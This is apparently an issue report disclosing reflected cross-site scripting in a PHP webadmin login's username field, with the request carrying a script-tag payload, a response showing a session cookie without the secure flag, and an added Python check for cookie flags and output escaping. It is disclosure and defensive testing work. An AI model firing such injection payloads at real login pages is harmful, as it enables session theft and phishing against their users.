Open roughpatch opened 4 years ago
The username parameter is insecure, allowing for cross-site script injection, link injection, and phishing through frames from the login page:
```
POST /webadmin/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: https://ourserver.com/webadmin/
Cookie: PHPSESSID=ra4sfb0vjui2ck2m95se7f06v0
Connection: keep-alive
Host: ourserver.com
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: https://ourserver.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded

loginwith=adlogin&username=<script>alert(1234)</script>&password=&submit=
```
Additionally, the PHPSESSID cookie is missing the 'secure' attribute:
```
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 2083
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Set-Cookie: PHPSESSID=fhbh9ljrnsddl2cu3jt1752942; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.4.16
Connection: Keep-Alive
Date: Mon, 09 Dec 2019 22:33:27 GMT
Keep-Alive: timeout=5, max=68
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
```
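A regression check for the two findings reported above, as an added example that is not part of the original report or the project's code. It assumes a hypothetical `render_login_field` template that echoes the username back into the form, and it also checks `HttpOnly`, which goes beyond the `secure` attribute the report names.

```python
import html

# Response headers from the report above (subset), reproduced for the check.
REPORTED_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload\r\n"
    "Set-Cookie: PHPSESSID=fhbh9ljrnsddl2cu3jt1752942; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
)
PROBE = "<script>alert(1234)</script>"  # username value from the reported request

# Secure is the flag named in the report; HttpOnly is an added assumption.
REQUIRED_FLAGS = ("secure", "httponly")


def missing_cookie_flags(raw_headers):
    """Map each cookie name to the required flags its Set-Cookie line lacks."""
    findings = {}
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].partition("=")[0]
        # Attribute names are case-insensitive; flag attributes carry no value.
        attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
        missing = [f for f in REQUIRED_FLAGS if f not in attrs]
        if missing:
            findings[cookie_name] = missing
    return findings


def render_login_field(username, escape=True):
    """Hypothetical template: echo the submitted username back into the form."""
    shown = html.escape(username, quote=True) if escape else username
    return '<input type="text" name="username" value="%s">' % shown


def reflects_unescaped(body, probe):
    """True when the probe comes back byte-for-byte, i.e. as live markup."""
    return probe in body


if __name__ == "__main__":
    print(missing_cookie_flags(REPORTED_HEADERS))
    for escape in (False, True):
        body = render_login_field(PROBE, escape=escape)
        print("escaped" if escape else "raw", reflects_unescaped(body, PROBE))
```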